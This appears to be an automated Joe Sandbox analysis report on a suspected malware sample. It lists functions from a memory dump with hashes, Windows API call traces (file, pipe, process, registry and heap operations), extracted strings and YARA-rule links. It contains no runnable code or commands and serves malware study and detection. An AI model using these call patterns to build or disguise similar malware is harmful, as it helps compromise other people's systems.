Instruction ID: eaaab354aad20de0a75d701b5cf20ae99e33728214b0b27d280ccd19b617f687
Opcode Fuzzy Hash: 40d40e0102323ef980ae5396bf4b63129aa457913df64c6d5b8ed3360802e8f1
Instruction Fuzzy Hash: A11150B2500114FFC7508F65DC89D5E7BAEDB813A0B044176F809D7250DB788E40C755

Uniqueness

Uniqueness Score: -1.00%

Function 0076CD78 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,00760062,00000000,00000000), ref: 0076CD96
GetLastError.KERNEL32(?,?,?,00760062,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,007583EC,?,0000001E), ref: 0076CD9E

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 83e82f3a2c9e6b6084415843f96de3d2a2ac551e34f044f018bd5e4fbcc10d38
Instruction ID: 26d89aedfbfd901766c3494641317c76013d442bd97a904218e0a9a989545d54
Opcode Fuzzy Hash: 83e82f3a2c9e6b6084415843f96de3d2a2ac551e34f044f018bd5e4fbcc10d38
Instruction Fuzzy Hash: 31018876208255BF86267A669C4CC6BBE7DF7CA7B0B104629FCA6D2281C7245800D675

Uniqueness

Uniqueness Score: -1.00%

Function 00761B46 Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 00761B5A

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

mbstowcs.NTDLL ref: 00761B74
lstrlen.KERNEL32(?), ref: 00761B7F
mbstowcs.NTDLL ref: 00761B99

Part of subcall function 00761577: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 007615C3
Part of subcall function 00761577: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 007615CF
Part of subcall function 00761577: memset.NTDLL ref: 00761617
Part of subcall function 00761577: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00761632
Part of subcall function 00761577: lstrlenW.KERNEL32(0000002C), ref: 0076166A
Part of subcall function 00761577: lstrlenW.KERNEL32(?), ref: 00761672
Part of subcall function 00761577: memset.NTDLL ref: 00761695
Part of subcall function 00761577: wcscpy.NTDLL ref: 007616A7

Part of subcall function 0077020F: HeapFree.KERNEL32(00000000,0076C525,00752B34,00000000,?,775EC740,0076C525), ref: 0077021B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
String ID:
API String ID: 1961997177-0
Opcode ID: c45f3c7b5621ad77fbe82660f13b27ba358877a4dccd0e59acf5c7c3eb6aa385
Instruction ID: 89bf16b5e32de814f02dabaf4f12766eea9cdda239e95cd4f98bc7bb9899923e
Opcode Fuzzy Hash: c45f3c7b5621ad77fbe82660f13b27ba358877a4dccd0e59acf5c7c3eb6aa385
Instruction Fuzzy Hash: 8D01B973900208F7CB116BA59C4EF9F7BADEF85750F144025F90A97102EA79DA1087A0

Uniqueness

Uniqueness Score: -1.00%

Function 007702E3 Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0076A939,00000000,00000000), ref: 007702F6
lstrlen.KERNEL32(03F0C178,?,?,?,0076A939,00000000,00000000), ref: 00770317
RtlAllocateHeap.NTDLL(00000000,00000014), ref: 0077032F
lstrcpy.KERNEL32(00000000,03F0C178), ref: 00770341

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
String ID:
API String ID: 1929783139-0
Opcode ID: b37eb787589fdc5d698bf111152d65e8da770f29890aa0506e0dab85c2df41b8
Instruction ID: 7243eceb3a5965dbaa3c2e54e4543efce154e523449f4f9a005d6fd6ec215686
Opcode Fuzzy Hash: b37eb787589fdc5d698bf111152d65e8da770f29890aa0506e0dab85c2df41b8
Instruction Fuzzy Hash: 0A018C76500244EFCB119BA8EC88A6E7BBCAB49341F148169E94DD3301D678DA44D7B5

Uniqueness

Uniqueness Score: -1.00%

Function 007674BB Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 007674C8
RtlAllocateHeap.NTDLL(00000000,00000015), ref: 007674EE
lstrcpy.KERNEL32(00000014,?), ref: 00767513
memcpy.NTDLL(?,?,?), ref: 00767520

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AllocateHeaplstrcpylstrlenmemcpy
String ID:
API String ID: 1388643974-0
Opcode ID: a2057ec97a3861ef1297a6e420c1391526726572c224d01a0e8b371ac2102cdf
Instruction ID: 4a1bd8f98cb58267639de93b07c316818e7924c8c2cf205a2a21ee0de224746f
Opcode Fuzzy Hash: a2057ec97a3861ef1297a6e420c1391526726572c224d01a0e8b371ac2102cdf
Instruction Fuzzy Hash: C7114971500219EFCB21CF58E844A9ABBF9FB48744F10C56AF84A87221D775E914DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0076448F Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

RtlInitializeCriticalSection.NTDLL(00778420), ref: 007644B3
RtlInitializeCriticalSection.NTDLL(00778400), ref: 007644C9
GetVersion.KERNEL32(?,00000000,?,?,0075DA8B,?,?,?), ref: 007644DA
GetModuleHandleA.KERNEL32(0000166E,?,00000000,?,?,0075DA8B,?,?,?), ref: 0076450E

Part of subcall function 0076C8FE: GetModuleHandleA.KERNEL32(?,00000001,77D59EB0,00000000,?,?,00000000,007644F1,?,00000000,?,?,0075DA8B,?,?,?), ref: 0076C916
Part of subcall function 0076C8FE: LoadLibraryA.KERNEL32(?), ref: 0076C9B7
Part of subcall function 0076C8FE: FreeLibrary.KERNEL32(00000000), ref: 0076C9C2

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
String ID:
API String ID: 1711133254-0
Opcode ID: 636e61cecdf20e9ee50c89ae0294a738974eab1134f82cb45f285247da9221f8
Instruction ID: fde5fbaabe6c50cee815a37bed7fb437bf92ae838b84f972727d06575129427d
Opcode Fuzzy Hash: 636e61cecdf20e9ee50c89ae0294a738974eab1134f82cb45f285247da9221f8
Instruction Fuzzy Hash: CD113CB1A802558FDB909F69EC4D6163BE5B744390740C43AE90E87221DFBC5882CF9B

Uniqueness

Uniqueness Score: -1.00%

Function 0076A07D Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON

Download Yara Rule

APIs

Part of subcall function 007540F1: lstrlen.KERNEL32(?,00772239,00000000,0076A093,00772239,?,74DFD3D0,?,?,0075DBD6,?,00000015,00003219), ref: 007540F6
Part of subcall function 007540F1: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0075410B
Part of subcall function 007540F1: wsprintfA.USER32 ref: 00754127
Part of subcall function 007540F1: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 00754143

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00772239,?,74DFD3D0,?,?,0075DBD6,?,00000015,00003219), ref: 0076A0AB
GetFileSize.KERNEL32(00000000,00000000,?,?,0075DBD6,?,00000015,00003219), ref: 0076A0BA
CloseHandle.KERNEL32(00000000,?,?,0075DBD6,?,00000015,00003219), ref: 0076A0C4
GetLastError.KERNEL32(?,?,0075DBD6,?,00000015,00003219), ref: 0076A0CC

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
String ID:
API String ID: 4042893638-0
Opcode ID: 39ed862b81eb77a043a0b20dea6b06fdbc99651702adbf873c4b7229d4b833a1
Instruction ID: c3be6930049386dfdef9f99bf39888688c22aafd6f1f333d6ba2eb2ecebfec0a
Opcode Fuzzy Hash: 39ed862b81eb77a043a0b20dea6b06fdbc99651702adbf873c4b7229d4b833a1
Instruction Fuzzy Hash: 1CF0F931100218FBD3302B65DC8DF9F7E5DFF057A1F10C115F90EA1091D6784A85DAA6

Uniqueness

Uniqueness Score: -1.00%

Function 00752934 Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 00752946

Part of subcall function 00755697: CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 007556D7
Part of subcall function 00755697: GetLastError.KERNEL32(?,00000080,00000000), ref: 007556E1
Part of subcall function 00755697: WaitForSingleObject.KERNEL32(000000C8,?,00000080,00000000), ref: 00755706
Part of subcall function 00755697: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,00000080,00000000), ref: 00755729
Part of subcall function 00755697: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,00000080,00000000), ref: 00755751
Part of subcall function 00755697: WriteFile.KERNEL32(?,00001388,?,?,00000000,?,00000080,00000000), ref: 00755766
Part of subcall function 00755697: SetEndOfFile.KERNEL32(?,?,00000080,00000000), ref: 00755773
Part of subcall function 00755697: CloseHandle.KERNEL32(?,?,00000080,00000000), ref: 0075578B

WaitForSingleObject.KERNEL32(00002710,?,?,?,00000005,?,?,?,?,?), ref: 00752969
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,00000005,?,?,?,?,?), ref: 0075298B
GetLastError.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,00000005,?,?,?,?,?), ref: 0075299F

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
String ID:
API String ID: 3370347312-0
Opcode ID: fa876ede2d89575f04f87f35ba38ffb2dc0635ce0c22092e5460dcb6c807cb0b
Instruction ID: cabc77713d8233ab85cdd6bc38531926e525f384b8d7aaf7ccc1479b6088176a
Opcode Fuzzy Hash: fa876ede2d89575f04f87f35ba38ffb2dc0635ce0c22092e5460dcb6c807cb0b
Instruction Fuzzy Hash: CDF0A431244205FBEB111F50DC4AFDE3B26AF06752F204410FA45A81E1DBB965A6DB6E

Uniqueness

Uniqueness Score: -1.00%

Function 0076DBAF Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00778080,00000000), ref: 0076DBBB
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 0076DBD6
lstrcpy.KERNEL32(00000000,?), ref: 0076DBFF
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0076DC20

Part of subcall function 0076875D: SetEvent.KERNEL32(?,?,0076EDFC), ref: 00768772
Part of subcall function 0076875D: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,0076EDFC), ref: 00768792
Part of subcall function 0076875D: CloseHandle.KERNEL32(00000000,?,0076EDFC), ref: 0076879B
Part of subcall function 0076875D: CloseHandle.KERNEL32(00000000,?,?,0076EDFC), ref: 007687A5
Part of subcall function 0076875D: RtlEnterCriticalSection.NTDLL(?), ref: 007687AD
Part of subcall function 0076875D: RtlLeaveCriticalSection.NTDLL(?), ref: 007687C5
Part of subcall function 0076875D: CloseHandle.KERNEL32(?), ref: 007687E1
Part of subcall function 0076875D: LocalFree.KERNEL32(?), ref: 007687EC
Part of subcall function 0076875D: RtlDeleteCriticalSection.NTDLL(?), ref: 007687F6

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
String ID:
API String ID: 1103286547-0
Opcode ID: 11957813de2004190fcb4c878f0ef0af1392bc4cf41c8c1f84cd5745c6d341ce
Instruction ID: 58b7ce94e7b971094ea2fad58e6cac12d4a3b163c2b3762a5e8058e54c7a4b51
Opcode Fuzzy Hash: 11957813de2004190fcb4c878f0ef0af1392bc4cf41c8c1f84cd5745c6d341ce
Instruction Fuzzy Hash: 8EF0C231780211ABDB705B61EC0EF563E59FB45BE1F048524FA0DAA2A0DD7CC889D77A

Uniqueness

Uniqueness Score: -1.00%

Function 00768803 Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00768811
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00768826
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00768833
CloseHandle.KERNEL32(?), ref: 00768845

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 267ad37e01c77e32f069e36845056e90935b57ee02b1c0dd0fa7a9d3caf625c8
Instruction ID: 1b10c474aa37539e8beb4dc895fc2233873fe0a18a1228b4c319b51bc0d06729
Opcode Fuzzy Hash: 267ad37e01c77e32f069e36845056e90935b57ee02b1c0dd0fa7a9d3caf625c8
Instruction Fuzzy Hash: 55F054B210430CBFD3106F65DCC4C2BBBADEB452987158A2DF44792111C676A8098A61

Uniqueness

Uniqueness Score: -1.00%

Function 007707D3 Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,0075BD88,000000FF,03F0B7F0,?,?,0076F562,0000003A,03F0B7F0), ref: 007707EF
GetLastError.KERNEL32(?,?,0076F562,0000003A,03F0B7F0,?,?,?,007632F0,00000001,00000000,03F0C314), ref: 007707FA
WaitNamedPipeA.KERNEL32(00002710), ref: 0077081C
WaitForSingleObject.KERNEL32(00000000,?,?,0076F562,0000003A,03F0B7F0,?,?,?,007632F0,00000001,00000000,03F0C314), ref: 0077082A

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
String ID:
API String ID: 4211439915-0
Opcode ID: fca593a6199c4eb57df5d49074409e36b62cd9cb4a5e2bade3d1f33de3ad0818
Instruction ID: 89760190bf171f99326ed4327a6b439e79271a1dc16a810a0020b81e80a52734
Opcode Fuzzy Hash: fca593a6199c4eb57df5d49074409e36b62cd9cb4a5e2bade3d1f33de3ad0818
Instruction Fuzzy Hash: 6CF06D32644220ABDA201B68EC4CB5BBF56EB403E1F51C621FA0DE61E0C6390C91DADA

Uniqueness

Uniqueness Score: -1.00%

Function 007540F1 Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00772239,00000000,0076A093,00772239,?,74DFD3D0,?,?,0075DBD6,?,00000015,00003219), ref: 007540F6
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0075410B
wsprintfA.USER32 ref: 00754127

Part of subcall function 00763F6E: memset.NTDLL ref: 00763F83
Part of subcall function 00763F6E: lstrlenW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 00763FBC
Part of subcall function 00763F6E: wcstombs.NTDLL ref: 00763FC6
Part of subcall function 00763F6E: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,?,00000000,?), ref: 00763FF7
Part of subcall function 00763F6E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,8Au), ref: 00764023
Part of subcall function 00763F6E: TerminateProcess.KERNEL32(?,000003E5), ref: 00764039
Part of subcall function 00763F6E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 0076404D
Part of subcall function 00763F6E: CloseHandle.KERNEL32(?), ref: 00764080
Part of subcall function 00763F6E: CloseHandle.KERNEL32(?), ref: 00764085

HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 00754143

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
String ID:
API String ID: 1624158581-0
Opcode ID: 67a85a21d11a2d907733d79f8206972d43939f062ed4cfd026411f28cdd26981
Instruction ID: b5c01a16e759381309b98fe8deda12b0e6e04e35ed50736c8671ed243230f026
Opcode Fuzzy Hash: 67a85a21d11a2d907733d79f8206972d43939f062ed4cfd026411f28cdd26981
Instruction Fuzzy Hash: 7FF0E932600414BBD6211729FC0CF6BBA6EEFC27A1F154121FD09D62A0DA6CCDC5C66D

Uniqueness

Uniqueness Score: -1.00%

Function 00764721 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(npw,03F0C314,0077706E,00000000,0076EF9E), ref: 0076472A
memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0076474D
memset.NTDLL ref: 0076475C

Strings

npw, xrefs: 00764724

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrlenmemcpymemset
String ID: npw
API String ID: 4042389641-1549181521
Opcode ID: 468189f8fac64f782664605273c6995a982c9f2d56d5b88cf40e65d92f0f73e1
Instruction ID: 002a1f2ebebbfd9b86313411309ae5c6ea9a44732a01f055404c03d0b6af3475
Opcode Fuzzy Hash: 468189f8fac64f782664605273c6995a982c9f2d56d5b88cf40e65d92f0f73e1
Instruction Fuzzy Hash: 7DE065B7904325A7C6306AB5AC8DD4F6ADEDBCA390B010935FD16D3101D628CD14C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 0076476C Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03F0C2D0), ref: 00764775
Sleep.KERNEL32(0000000A,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 0076477F
HeapFree.KERNEL32(00000000,?,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 007647A7
RtlLeaveCriticalSection.NTDLL(03F0C2D0), ref: 007647C5

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 9ad7e69aff2b2e2a38ea65b5faee72bcff12bd9a87c9d8c8fff4fc4c5913f868
Instruction ID: b6150c30a8e561b37f2b14aef1cf3c5e158152059b83cc7e73f194c7fad24653
Opcode Fuzzy Hash: 9ad7e69aff2b2e2a38ea65b5faee72bcff12bd9a87c9d8c8fff4fc4c5913f868
Instruction Fuzzy Hash: B0F05E712402019FE7109B68EC8DF1A7BA5AB01780F14C415F90ED71A1DB38E984DB1E

Uniqueness

Uniqueness Score: -1.00%

Function 007511FC Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03F0C2D0), ref: 00751205
Sleep.KERNEL32(0000000A,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 0075120F
HeapFree.KERNEL32(00000000,?,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 0075123D
RtlLeaveCriticalSection.NTDLL(03F0C2D0), ref: 00751252

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 871003307eed340041d202167183a017f4bb4d8e2fbfdd6249f8f1c4c0a62fe2
Instruction ID: cce59250c8e7b7210de52197da4d8fda81ad46819fad81b8c6021e4e72ae88d5
Opcode Fuzzy Hash: 871003307eed340041d202167183a017f4bb4d8e2fbfdd6249f8f1c4c0a62fe2
Instruction Fuzzy Hash: B4F03A743802029BEB048B68DC8DB2977A1BB00782B04D019E80AC72A0CB7CAC85DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 007715F1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON

Download Yara Rule

Strings

%"w, xrefs: 00771659
$w, xrefs: 00771638, 0077167F

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: $w$%"w
API String ID: 1279760036-2530665746
Opcode ID: b082b05bdc9f2d61cb636e94e4e820806c329a8c0ee8a3b0e2f41eaa2a0b4333
Instruction ID: 987c4154fcaf8b766b5d8273a254252e034f5d95215883bb49de001987a73300
Opcode Fuzzy Hash: b082b05bdc9f2d61cb636e94e4e820806c329a8c0ee8a3b0e2f41eaa2a0b4333
Instruction Fuzzy Hash: 4E3178B1108305BFDB119F54CC88C6BBBADFB883D4F448929F98991071DB35CA55EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0076B6B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0076B71C
CloseHandle.KERNEL32(?), ref: 0076B731

Strings

"w, xrefs: 0076B70B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CloseHandleObjectSingleWait
String ID: "w
API String ID: 528846559-2380412451
Opcode ID: 73a755063b9ca134c3d85e8b467bfc31f671d3a2bc343dc93d1db8d4d7ebc316
Instruction ID: a1dd780411ce8d3cc5e2a1835466ef8c84a83885ab977cd3907d6ad449924368
Opcode Fuzzy Hash: 73a755063b9ca134c3d85e8b467bfc31f671d3a2bc343dc93d1db8d4d7ebc316
Instruction Fuzzy Hash: BC211A76900159AFDB009FA8DC848EEBBB9FB09354F004576FE26E3260E3749D94CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0076F415 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0076F427
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00759799,00000000), ref: 0076F478

Strings

u$w, xrefs: 0076F433

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID: u$w
API String ID: 2488874121-2465363600
Opcode ID: 67e17e30d6a7bb91f712005c3864b6c8e2cb64fdbdd62dcec717387cbb3edd1e
Instruction ID: 45bfe18748aefff230a1061b704521d95aaab3171595f9bf1c6ba282db074acc
Opcode Fuzzy Hash: 67e17e30d6a7bb91f712005c3864b6c8e2cb64fdbdd62dcec717387cbb3edd1e
Instruction Fuzzy Hash: D1F0C2B2241218BEF6202775FC8DEAB2A5DDB453E9B018131FA0996150DA6C8C89C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 00767550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

GetShellWindow.USER32 ref: 0076755C

Strings

e)w, xrefs: 007675C0
V'w, xrefs: 0076756B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ShellWindow
String ID: V'w$e)w
API String ID: 2831631499-1733902452
Opcode ID: 2335e2ff4c095daffd492804bae064de1973f3b60a2439deb5cee7c3c593e45d
Instruction ID: b66594fd79e03616ba93edff371f39c4a5a486f933d5d6a95901ad222dbc4462
Opcode Fuzzy Hash: 2335e2ff4c095daffd492804bae064de1973f3b60a2439deb5cee7c3c593e45d
Instruction Fuzzy Hash: F61118B0A043059FDB24AFB5CC09B2ABBF4AF44740F10896DE55AC7291E678E980CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00767223 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

RtlEnterCriticalSection.NTDLL(00778400), ref: 0076724F

Part of subcall function 00755C9A: GetVersion.KERNEL32(00778400,0076725D,?,00000000,?,?,0075DA8B,?), ref: 00755C9E
Part of subcall function 00755C9A: GetModuleHandleA.KERNEL32(?,03F0971F,?,00000000,?,?,0075DA8B,?), ref: 00755CBB
Part of subcall function 00755C9A: GetProcAddress.KERNEL32(00000000), ref: 00755CC2

RtlLeaveCriticalSection.NTDLL(00778400), ref: 00767282

Strings

0xw, xrefs: 00767241

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalSection$AddressAllocateEnterHandleHeapLeaveModuleProcVersion
String ID: 0xw
API String ID: 3172813276-4071435235
Opcode ID: 1d2f1076b52bf865becf10e8e22701a6b114dd12b79cdb6db53304a90cd3ac1d
Instruction ID: 16bbab071fd0229edcd955fbc5bf22022e29d7aadb617df8ed7290299a0a846b
Opcode Fuzzy Hash: 1d2f1076b52bf865becf10e8e22701a6b114dd12b79cdb6db53304a90cd3ac1d
Instruction Fuzzy Hash: 92F0AFB1540A13DFCB555F1DDC58A46FBF8FF507947108129E81D9B210CBB89842CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00767E12 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,?,0076C08A,00000000,?,?,?,007685A2,?,?,?,00000000,?,?,?,?), ref: 00767E1F
SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,007685A2,?,?,?,00000000,?,?,?), ref: 00767E59

Part of subcall function 0075F212: RegSetValueExA.ADVAPI32(00000000,0077706E,00000000,00000001,03F0C314,00000000,00000001,00000000,00777068,00000000,?,?,00763384,00000000,00777068,00000028), ref: 0075F244
Part of subcall function 0075F212: RegCloseKey.ADVAPI32(00000000,?,?,00763384,00000000,00777068,00000028,00000003,00000001,00000000,03F0C314,0077706E,00000000,775EC740,0076EF5B,03F0C314), ref: 0075F25D

Strings

W"w, xrefs: 00767E3A

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Time$CloseFileSystemTimerValueWaitable
String ID: W"w
API String ID: 914310704-4284564376
